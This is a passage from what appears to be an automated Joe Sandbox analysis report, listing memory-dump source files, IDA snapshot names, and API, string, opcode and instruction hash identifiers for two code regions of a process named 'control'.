                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: +$-
                                          • API String ID: 1302938615-2137968064
                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                          • Instruction ID: 72d7e75977ec2894704f05b0a029ab14eff4f4d16f48327db01f41cba3d0e88d
                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                          • Instruction Fuzzy Hash: 07917D70F2021ADADF24DE69C881ABEB7E5FF45720F54461AE855E72C0E730AD409B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $$@
                                          • API String ID: 0-1194432280
                                          • Opcode ID: 7ab1105f5d6492c3c56c753b0c764f3d60036720e455792e458af5f7e76a9760
                                          • Instruction ID: 299c08e9f06ff7266431873e78c8f6039cdbbf8ab9fc58d169455869f7e9bb9e
                                          • Opcode Fuzzy Hash: 7ab1105f5d6492c3c56c753b0c764f3d60036720e455792e458af5f7e76a9760
                                          • Instruction Fuzzy Hash: 30812EB2D00269DBDB31DF54CC54BEEB7B4AB48754F0041DAA95AB7250E730AE85CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%